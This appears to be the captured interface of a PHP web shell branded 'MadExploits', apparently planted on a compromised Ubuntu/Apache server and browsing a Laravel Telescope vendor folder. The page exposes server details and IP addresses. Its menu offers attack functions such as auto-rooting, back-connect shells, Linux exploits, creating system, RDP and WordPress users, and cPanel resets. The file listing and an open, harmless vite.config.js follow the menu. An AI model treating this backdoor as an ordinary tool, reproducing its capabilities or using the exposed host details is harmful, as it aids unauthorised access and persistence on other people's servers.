Linux 5474007-topit 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
Apache/2.4.52 (Ubuntu)
: 85.198.82.39 | : 216.73.216.129
Cant Read [ /etc/named.conf ]
8.3.30
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
back /
vendor /
laravel /
telescope /
[ HOME SHELL ]
Name
Size
Permission
Action
art
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
dist
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
routes
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
stubs
[ DIR ]
drwxr-xr-x
workbench
[ DIR ]
drwxr-xr-x
LICENSE.md
1.05
KB
-rw-r--r--
README.md
1.93
KB
-rw-r--r--
composer.json
2.04
KB
-rw-r--r--
package.json
716
B
-rw-r--r--
testbench.yaml
263
B
-rw-r--r--
vite.config.js
578
B
-rw-r--r--
webpack.mix.js
1.19
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : vite.config.js
import vue2 from '@vitejs/plugin-vue2'; /** @type {import('vite').UserConfig} */ export default { plugins: [vue2()], build: { assetsDir: '', rollupOptions: { input: ['resources/js/app.js', 'resources/sass/styles.scss', 'resources/sass/styles-dark.scss'], output: { entryFileNames: '[name].js', chunkFileNames: '[name].js', assetFileNames: '[name].[ext]', }, }, }, resolve: { alias: { vue: 'vue/dist/vue.esm.js', }, }, };
Close